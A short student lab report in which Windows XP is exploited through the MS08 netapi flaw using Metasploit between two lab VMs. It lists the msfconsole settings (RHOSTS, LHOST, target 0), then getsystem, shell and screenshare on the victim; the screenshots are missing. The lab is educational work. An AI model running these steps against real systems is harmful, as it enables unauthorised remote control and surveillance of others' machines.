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This lab focuses on using netapi vulnerability to

exploit windows XP.

Muhammad Huzaifa

Lab 06
Starting with checking the IP addresses of both VMs. Below is the Ip for windows XP in host only mode.

Similarly check the IP address for kali Linux using “ifconfig”.

The very 1st step is to check the MS08 exploit in msfconsole as shown below:

We are going to use the very 1st exploit we saw after running this command.
Now set the relevant fields for exploit to run. Use the following steps:

 Set RHOSTS <Targets IP Address>

 Set LHOST <Kalis IP Address>
 Set target 0.

Use run or exploit to start exploiting target.

Now you can see in the screenshot above that our kali’s Metasploit has been connected to the target’s
machine. Now you just need to use the following commands to get system information.

 Use getsystem to get system information

Shell commands get the raw shell of the target machine and we can run the commands that can run on
target machine itself.

Use shell command to get raw shell as shown in screenshot below:

Another famous command is the use of screenshare to see what is happening on victim’s machine. To
get a view of target device use “screenshare” command as shown below:
The result of the following command will be something like this:


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